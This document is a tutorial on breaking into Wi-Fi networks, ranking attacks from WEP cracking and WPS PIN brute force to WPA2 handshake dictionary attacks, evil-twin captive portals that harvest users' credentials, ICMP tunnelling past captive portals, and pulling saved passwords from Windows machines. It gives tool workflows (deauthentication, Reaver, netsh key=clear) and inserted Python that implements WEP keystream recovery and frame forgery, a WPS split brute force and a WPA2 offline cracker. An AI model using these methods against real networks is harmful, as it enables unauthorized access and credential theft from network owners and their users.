Hacking WiFi – Selecting the best strategy

Not every attack works under every circumstance, so choosing the right strategy up front makes success more likely and saves hours of wasted effort and frustration.

Here, I lay out the strategies from the simplest and most effective first to the most complex and difficult last. In general, the probability of success follows the same continuum.

Before You Begin Wi-Fi Password Cracking

I strongly suggest that you read this article to become familiar with the terminology and basic technology of wireless hacking. In addition, to really be effective at Wi-Fi password cracking with Aircrack-ng, the premier Wi-Fi cracking suite, you will need an Aircrack-ng compatible wireless adapter: one whose driver supports monitor mode and packet injection. Although it is not the perfect wireless cracking adapter, the Alfa AWUS036H is inexpensive, effective, and plug and play on Kali Linux. Check the adapter before you rely on it: airmon-ng must be able to put it into monitor mode, and the injection test (aireplay-ng -9 against the monitor interface) must report that injection is working.

1. Crack WEP

WEP, or Wired Equivalent Privacy, was the first wireless encryption technology developed. It was quickly found to be flawed and easily cracked. Although no new AP defaults to WEP any more, there are still many legacy WEP networks around. (On a recent consulting gig with a major U.S. Department of Defense contractor, I found nearly 25% of their APs were using WEP, so it’s still out there.)

WEP can easily be cracked with Aircrack-ng using a statistical attack (the PTW attack in current versions, which needs on the order of tens of thousands of captured IVs rather than the millions the older attacks needed). It is nearly foolproof (don’t prove me wrong on this). If you can collect enough packets (this is key), it’s a simple process. This is one of the reasons you need an Aircrack-ng compatible wireless adapter: you must be able to inject packets while simultaneously capturing them, so that aireplay-ng can replay captured ARP requests and make the AP generate fresh IVs in minutes instead of waiting hours for organic traffic. Most off-the-shelf wireless cards are incapable of this.

To tell whether an AP is using WEP, look at the ENC column of the airodump-ng output (or at the security type your operating system's network list shows when you hover over the network name). Keep in mind that this statistical attack works only against WEP; it does nothing against WPA or WPA2. If you are lucky enough to find a WEP AP, you can expect to recover its key within 10 minutes, although some claim to have done it in less than 3.
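
To show why WEP falls to traffic collection, here is an added example that is not part of the original article and not Aircrack-ng's code. It implements RC4 and WEP framing, then plays both sides: a receiver that checks the ICV, and an attacker who, from one frame whose plaintext they know (the LLC/SNAP header is always known, and a frame they provoked is known in full), recovers the keystream for that 24-bit IV, reads a later frame that reuses the IV, and forges a frame the receiver accepts, all without the key. The key, IV and frame contents are constructed for the walkthrough, the key-ID byte after the IV is omitted, and the statistical key recovery that aircrack-ng performs on top of this weakness is not reproduced here.

```python
import zlib

# LLC/SNAP header that starts every IPv4 data frame, so an eavesdropper always knows
# the first 8 plaintext bytes of such a frame (0x0800 = IPv4; ARP would end in 0x0806).
SNAP_IPV4 = bytes.fromhex("aaaa030000000800")

# Constructed values for the walkthrough: the attacker never learns WEP_KEY.
WEP_KEY = bytes.fromhex("0102030405")   # 40-bit key
IV = bytes.fromhex("4b2d17")            # one of only 2**24 IVs, so reuse is inevitable


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA then PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian on the wire."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = cleartext IV || RC4(IV || key) XOR (plaintext || ICV).
    The key-ID byte that follows the IV on the air is left out for brevity."""
    keystream = rc4_keystream(iv + wep_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Receiver side: strip the IV, decrypt, check the ICV. Returns None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    pt_icv = xor(body, rc4_keystream(iv + wep_key, len(body)))
    pt, tag = pt_icv[:-4], pt_icv[-4:]
    return pt if icv(pt) == tag else None


def recover_keystream(frame: bytes, known_plaintext: bytes):
    """Attacker side: ciphertext XOR known plaintext = keystream for this IV.
    Knowing only the SNAP header yields 8 bytes; knowing a whole frame (one you
    provoked, say a ping to the victim) yields the ICV too and thus the whole keystream."""
    iv, body = frame[:3], frame[3:]
    known = known_plaintext
    if len(known) == len(body) - 4:
        known += icv(known)
    return iv, xor(body[:len(known)], known)


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Attacker side: encrypt an arbitrary frame under a reused IV with no key at all.
    This is the primitive behind injecting frames into a WEP network."""
    if len(plaintext) + 4 > len(keystream):
        raise ValueError("need at least len(plaintext)+4 bytes of keystream")
    return iv + xor(plaintext + icv(plaintext), keystream)


def walkthrough() -> dict:
    # 1. A frame whose full plaintext the attacker knows (constructed here).
    known_pt = SNAP_IPV4 + b"ICMP echo, contents chosen by the attacker"
    iv, ks = recover_keystream(wep_encrypt(WEP_KEY, IV, known_pt), known_pt)
    # 2. A later frame that reuses the IV is readable up to len(ks) without the key.
    secret_pt = SNAP_IPV4 + b"POST /login user=bob&pw=hunter2"
    secret_frame = wep_encrypt(WEP_KEY, IV, secret_pt)
    recovered = xor(secret_frame[3:], ks)[:len(secret_pt)]
    # 3. A forged frame under that IV passes the receiver's ICV check.
    forged = forge_frame(iv, ks, SNAP_IPV4 + b"injected by attacker")
    return {"keystream_len": len(ks), "recovered": recovered,
            "forged_accepted": wep_decrypt(WEP_KEY, forged)}
```

Two things carry over to the real attack: the IV is sent in the clear and is only 24 bits, so a busy AP repeats IVs within hours, and the CRC-32 ICV is linear, so a forged frame needs no secret to look valid. That is why the number of captured IVs, not CPU time, is the thing that matters.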

2. Crack WPS

Many Wi-Fi APs were equipped with Wi-Fi Protected Setup, or WPS, to make it simpler for the average home user without knowledge of Wi-Fi security measures to set up their wireless AP. Fortunately for us, if we can recover the WPS PIN, the AP hands over its WPA/WPA2 pre-shared key as part of the WPS exchange, and we join the network without ever cracking the PSK itself.

The PIN is only eight digits, and the eighth is a checksum of the other seven, so there are at most 10,000,000 PINs. Worse, the AP validates the PIN in two halves and reveals which half was wrong, so the attacker guesses the first four digits (10,000 possibilities) and then the remaining three (1,000 possibilities, since the checksum digit follows from them) separately: at most 11,000 online guesses in all. The limiting factor is not your CPU but how fast the AP answers WPS requests, so in practice a PIN falls in hours to days depending on the AP. Brute-forcing the PSK itself, with a vastly larger keyspace, can take far longer.

If the wireless AP has WPS enabled, this is the preferred method of attacking modern WPA2 APs. Use the wash tool (shipped with Reaver) to list nearby APs that advertise WPS, then attack the PIN with either Reaver or Bully while the adapter is in monitor mode (airmon-ng). The main obstacle is WPS lockout: many APs stop answering after a run of failed PINs, so the attack may need to be slowed down or resumed later.
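
The arithmetic above is easy to check in code. The following is an added example, not part of the original article and not Reaver's or Bully's code: it computes the WPS check digit, models the AP as an oracle that rejects a wrong first half after message M4 and a wrong second half after M6 (the behaviour the attack depends on), and runs the split search against it to count how many guesses it takes. The AP class and its message names are a simplified stand-in constructed for this example.

```python
def wps_checksum(pin7: int) -> int:
    """Check digit for a 7-digit WPS PIN body: the WPS spec's weighted mod-10 sum
    (3x the digits in odd positions from the right, 1x the others)."""
    accum, pin = 0, pin7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def full_pin(pin7: int) -> str:
    """7-digit body -> the 8-digit PIN as printed on the router label."""
    return f"{pin7:07d}{wps_checksum(pin7)}"


def is_valid_pin(pin8: str) -> bool:
    return len(pin8) == 8 and pin8.isdigit() and wps_checksum(int(pin8[:7])) == int(pin8[7])


class SimulatedAP:
    """Toy oracle standing in for the AP's WPS registrar exchange (constructed for this example).
    The AP answers M4 with a NACK if the first half of the PIN is wrong, answers M6 with
    a NACK if the second half is wrong, and otherwise sends M7, which carries the WPA2 PSK.
    Leaking which half failed is the whole design flaw."""

    def __init__(self, pin8: str):
        self.pin8 = pin8
        self.attempts = 0

    def try_pin(self, guess8: str) -> str:
        self.attempts += 1
        if guess8[:4] != self.pin8[:4]:
            return "NACK after M4"
        if guess8[4:] != self.pin8[4:]:
            return "NACK after M6"
        return "M7 with credentials"


def split_bruteforce(ap: SimulatedAP):
    """What Reaver and Bully do: at most 10,000 guesses for the first half, then at most
    1,000 for digits 5-7, because the eighth digit is fixed by the checksum."""
    first_half = None
    for a in range(10_000):
        if ap.try_pin(f"{a:04d}0000") != "NACK after M4":
            first_half = f"{a:04d}"
            break
    if first_half is None:
        return None
    for b in range(1_000):
        guess = full_pin(int(first_half + f"{b:03d}"))
        if ap.try_pin(guess).startswith("M7"):
            return guess
    return None
```

Against the PIN 12345670 (a valid PIN; 1234567 has check digit 0) the search needs 1,235 guesses for the first half and 568 for the second, 1,803 in total, against the 1,234,568 a naive seven-digit search would need. The real AP answers each guess in roughly a second and may lock WPS after a burst of failures, which is where the hours come from.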

3. Crack WPA2

After the disaster that was WEP, the wireless industry developed WPA as a stopgap and then WPA2, or Wi-Fi Protected Access II (IEEE 802.11i). This standard is now built into nearly every new wireless AP. Although more difficult to hack, it is not impossible.

When a client connects to the AP, the two perform a 4-way handshake. The pre-shared key (PSK) itself is never sent over the air: both sides derive it from the passphrase and SSID (PBKDF2 with HMAC-SHA1, 4,096 iterations), combine it with the two MAC addresses and the two nonces exchanged in the handshake to produce the session keys, and prove they hold those keys with a MIC on each handshake message. What we capture is the nonces and the MICs, and that is enough to test passphrase guesses offline: derive the keys from each candidate and see whether the MIC matches. With Aircrack-ng the workflow is airodump-ng to capture, an aireplay-ng deauthentication to force a client to reconnect and hand you a fresh handshake, then aircrack-ng with a wordlist against the capture file. This can be time-consuming and is not always successful. Success depends on the wordlist you use and the time you have to crack it.

Once you have the handshake captured, you no longer need to be near the AP; the guessing is entirely offline, and GPU crackers run it far faster than aircrack-ng does. In principle, with enough resources, any PSK can be brute-forced, but a WPA2 passphrase can be up to 63 characters, and a long random one is out of reach. Your wordlist, not your hardware, decides the outcome.
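
The offline check described above, as an added example that is not part of the original article and not Aircrack-ng's code. It implements the WPA2 key derivation (PBKDF2 to the PMK, the 802.11i PRF-512 to the PTK, HMAC-SHA1 over the EAPOL-Key frame for the MIC) and runs a wordlist against a handshake. Since no capture file is available here, the "capture" (MAC addresses, nonces, a minimal EAPOL-Key message 2 and its MIC) is constructed in the script with a known passphrase; the PMK derivation is checked against the IEEE 802.11i test vector for passphrase "password" and SSID "IEEE".

```python
import hashlib
import hmac

MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4,096 iterations are what makes each guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 over the two MACs and two nonces from the handshake.
    The first 16 bytes of the PTK are the KCK, the key that signs the EAPOL messages."""
    b = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    blocks = [hmac.new(pmk, label + b"\x00" + b + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def dictionary_attack(capture: dict, wordlist):
    """Offline: for each candidate, PMK -> PTK -> KCK, then compare the computed MIC with
    the one captured in message 2. Nothing here talks to the AP."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2, constructed for this example (a real one also carries
    the RSN IE in Key Data). Key Info 0x010a = descriptor version 2, pairwise, MIC present."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")   # type, info, key len, replay ctr
            + snonce + bytes(16) + bytes(8) + bytes(8)                      # nonce, IV, RSC, key ID
            + bytes(16) + b"\x00\x00")                                       # MIC (zeroed), key data len
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body                 # 802.1X header


def make_constructed_capture(passphrase: str, ssid: str) -> dict:
    """Stand-in for what airodump-ng writes to a .cap file: MACs, nonces, message 2 and its MIC,
    generated here with the real passphrase so there is something to crack."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = hashlib.sha256(b"ANonce").digest(), hashlib.sha256(b"SNonce").digest()
    eapol = build_msg2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}
```

Note what the attacker needs from the air: both MACs, both nonces and one MIC'd EAPOL message. The passphrase never appears, which is why a strong passphrase survives even a perfect capture, and why the cost per guess is dominated by the 4,096 PBKDF2 rounds.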

4. Evil Twin

If we can’t crack the password on the AP, another strategy that can be successful is creating an Evil Twin—an AP with exactly the same SSID as the known AP, but controlled by us. The key is for the target to connect to our AP, rather than the authentic AP.

Generally, clients roam to the AP of a known network with the strongest signal, so turning up the power on your AP can be a critical element of this hack. Note that modern clients match a saved network on its security type as well as its SSID, so an open evil twin of a WPA2 network is usually ignored; the attack is most effective against open networks, or when you also hold the PSK. When the user connects to our AP, we can capture all their traffic, read anything sent in cleartext, and capture any credentials they present to other systems.

An effective variation on the Evil Twin is to set up a system with the same SSID and then present the user with a logon screen. Many corporate offices, hotels, coffee shops, etc. use this kind of captive-portal login. When the user enters their credentials in our fake logon screen, we capture and store them. We can then use those credentials on the authentic AP to gain access.

This process has been automated by a script called Airsnarf. Unfortunately, Airsnarf is out of date, but I have been working on updating it and will present the script and tutorial soon.

5. ICMPTX

If all else fails and you absolutely MUST have Internet access, ICMPTX often works on wireless networks that require authentication through a captive portal or proxy. These include some schools and universities, hotels, coffee shops, libraries, restaurants, and other public Wi-Fi spots. It relies on the fact that ICMP echo (the ping protocol) is often allowed through the gateway to arbitrary Internet hosts even before you authenticate. Since it is not TCP, it never touches the proxy; it simply passes through. You need a host of your own on the Internet running the other end of the tunnel, and both ends need root to open the tun device and raw sockets.

This hack is complex and time consuming and is not for beginners. It is slow: every IP packet has to ride inside an echo request and come back inside an echo reply, and gateways often rate-limit ICMP. But in the circumstance where you actually MUST have Internet access and the amount of data is small, such as email, it works.
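
To make the tunnelling idea concrete, here is an added example that is not ICMPTX's code (its real wire framing differs, and it moves packets between a tun device and a raw socket). It builds and parses ICMP echo packets with the RFC 1071 checksum and shows an IP datagram being split across echo requests by the client side and reassembled by the server side. Using the echo identifier to tag the tunnel and the sequence number as a chunk index, and the chunk size, are assumptions of this example.

```python
import struct

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum, as used by ICMP. Over a valid packet
    (checksum field included) it evaluates to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """8-byte ICMP header (type, code, checksum, identifier, sequence) plus payload."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_icmp_echo(packet: bytes):
    """Returns (type, ident, seq, payload), or None if the packet is short or corrupt."""
    if len(packet) < 8 or inet_checksum(packet) != 0:
        return None
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return icmp_type, ident, seq, packet[8:]


def encapsulate(datagram: bytes, ident: int, chunk_size: int = 1400) -> list:
    """Tunnel client (simplified framing assumed for this example): split one IP datagram
    into echo requests, one chunk per packet, with seq numbering the chunks."""
    chunks = [datagram[i:i + chunk_size] for i in range(0, len(datagram), chunk_size)]
    return [build_icmp_echo(ICMP_ECHO_REQUEST, ident, seq, c) for seq, c in enumerate(chunks)]


def decapsulate(packets, ident: int) -> bytes:
    """Tunnel server: keep only our identifier, drop corrupt packets, reassemble by seq.
    Ordinary pings to the same host carry a different identifier and are ignored."""
    parts = {}
    for p in packets:
        parsed = parse_icmp_echo(p)
        if parsed is None or parsed[0] != ICMP_ECHO_REQUEST or parsed[1] != ident:
            continue
        parts[parsed[2]] = parsed[3]
    return b"".join(parts[s] for s in sorted(parts))
```

The overhead is visible in the numbers: each chunk costs an 8-byte ICMP header plus an outer IP header in each direction, and the reply direction only moves data when the client has sent a request for it to ride on, which is the real reason such tunnels feel slow.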

Other Strategies

There are numerous strategies for owning a target system, including social engineering and the many Metasploit exploits. Once you have access to a Windows machine on the network, you can simply extract the wireless password from its saved profile at:

C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{Interface GUID}\

There you will find one XML document per saved network. The document itself is plain text; the password sits in its keyMaterial element, hex-encoded and, when the protected element is true, encrypted with DPAPI under the machine's system key, so it has to be decrypted on that host. With administrator rights the quicker route is netsh wlan show profile name="SSID" key=clear, which prints the password in the clear.
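
A parser for that profile format, as an added example that is not part of the original article. The sample document below is constructed in the shape Wlansvc uses (namespace, SSIDConfig, MSM/security/authEncryption and sharedKey); with protected set to false and a plaintext keyMaterial it matches what netsh's key=clear export writes, while the file on disk normally has protected set to true and a hex DPAPI blob, which the parser reports rather than pretending to decrypt. The SSID, password and the truncated blob used in the checks are made up.

```python
import xml.etree.ElementTree as ET

NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# Constructed profile (SSID and password are invented). One such file exists per saved network.
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CorpWiFi</name>
  <SSIDConfig><SSID><hex>436F727057694669</hex><name>CorpWiFi</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>false</protected>
      <keyMaterial>Summer2014!</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>
"""


def parse_wlan_profile(xml_text: str) -> dict:
    """Pull the fields an attacker cares about out of a Wlansvc profile document."""
    root = ET.fromstring(xml_text)

    def text(path: str):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    sec = "w:MSM/w:security/"
    protected = text(sec + "w:sharedKey/w:protected") == "true"
    key_material = text(sec + "w:sharedKey/w:keyMaterial")
    ssid_hex = text("w:SSIDConfig/w:SSID/w:hex")
    ssid = text("w:SSIDConfig/w:SSID/w:name") or (bytes.fromhex(ssid_hex).decode() if ssid_hex else None)
    return {
        "ssid": ssid,
        "auth": text(sec + "w:authEncryption/w:authentication"),
        "encryption": text(sec + "w:authEncryption/w:encryption"),
        "key_type": text(sec + "w:sharedKey/w:keyType"),
        "protected": protected,
        # Plaintext only when protected is false. Otherwise keyMaterial is a hex-encoded
        # DPAPI blob that must be unprotected on the originating host (system scope).
        "password": None if protected else key_material,
        "dpapi_blob": bytes.fromhex(key_material) if protected and key_material else None,
    }


def summarize(xml_text: str) -> str:
    p = parse_wlan_profile(xml_text)
    head = f'{p["ssid"]} ({p["auth"]}/{p["encryption"]}): '
    if p["password"] is not None:
        return head + p["password"]
    return head + "key is DPAPI-protected, decrypt on the host or use netsh with key=clear"
```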

Gaining access to a wireless network can be as simple as cracking a WEP key or as involved as tunnelling through ICMPTX, but wireless access can be broken. If all else fails, target one machine on the network, own it, and recover the password as described above.
